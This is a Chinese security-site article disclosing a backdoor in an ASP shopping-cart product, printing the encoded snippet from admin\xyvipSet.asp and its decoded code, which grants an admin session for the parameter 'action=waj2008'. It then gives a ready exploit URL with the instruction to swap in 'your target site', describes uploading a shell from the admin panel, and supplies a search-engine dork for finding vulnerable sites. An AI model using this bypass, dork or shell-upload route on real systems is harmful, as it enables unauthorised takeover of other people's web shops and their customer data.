首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
无忧购物系统ASP时尚版存在后门利用漏洞
来源:vfocus.net 作者:流浪的风 发布时间:2011-02-15  

无忧购物系统ASP时尚版存在后门,可直接登录拿shell,这后门不知道是本来就有还是另外别人添加的,以前的版本有没有这后门,我倒是没注意了

下载地址:以下两个地址下载的都有后门存在,其他网站的就没有看了

http://down.admin5.com/asp/3090.html  

http://www.onlinedown.net/soft/85106.htm

后门存在文件:admin\xyvipSet.asp

前些天没事干,刚好看到"无忧购物系统ASP时尚版 V2011.1.19",这个版本貌似是新出来的,以前的版本我有看过,漏洞不少,这个版本呢?

刚好今天有时间,就下载过来看了下,没想到漏洞还没找到,后门倒是发现了一个,晕了,漏洞不找也罢,这么大的后门存在,还有什么好找的。。。

在xyvipSet.asp文件中,有一处地方加密了,我就奇怪了,整个程序都没加密,就这地方加密了,有什么奥妙?

“#@~^iQAAAA==@#@&kW,D ;E /DcJmmOkKxEb{Jhm% Z!%r~Ot x@#@&d+ddbWU`rCNskUE*'JACN T!RE@#@&d /kkW `rWVmoE#{F@#@&M+/aGxk+R"n[kM+1Y~JrU9+aRmdwr@#@&n NPrW@#@&pCYAAA==^#~@”

解密了一下,明文出来了

if request("action")="waj2008" then
session("admin")="waj2008"
session("flag")=1
response.Redirect "index.asp"
end if

汗,好嚣张的后门啊

 

利用方式:http://www.hackqing.com/admin/xyvipset.asp?action=waj2008

www.hackqing.com替换成你的目标网站即可

进入后台的话,利用上传就可以拿shell了。

 

inurl:style/info/domain.asp intext:.com

 

by  流浪的风


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·GnuBoard本地文件包含漏洞
·php168 v6~v7鸡肋Getshell安全问
·Diy-Page v8.2 两个注入漏洞分析
·ecshop支付漏洞最新可用EXP利用
·天天团购 V1.2.0 Beta SQL injec
·DISCUZX1.5 本地文件包含漏洞
·皮皮播放器ActiveX控件PlayURLWi
·皮皮播放器ActiveX控件 PlayURL
·EimsCms v5.0 XSS+CSRF=GetShell
·风神新闻管理静态版1.7漏洞
·plesk panel 虚拟主机管理平台 0
·入侵网站的经验
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved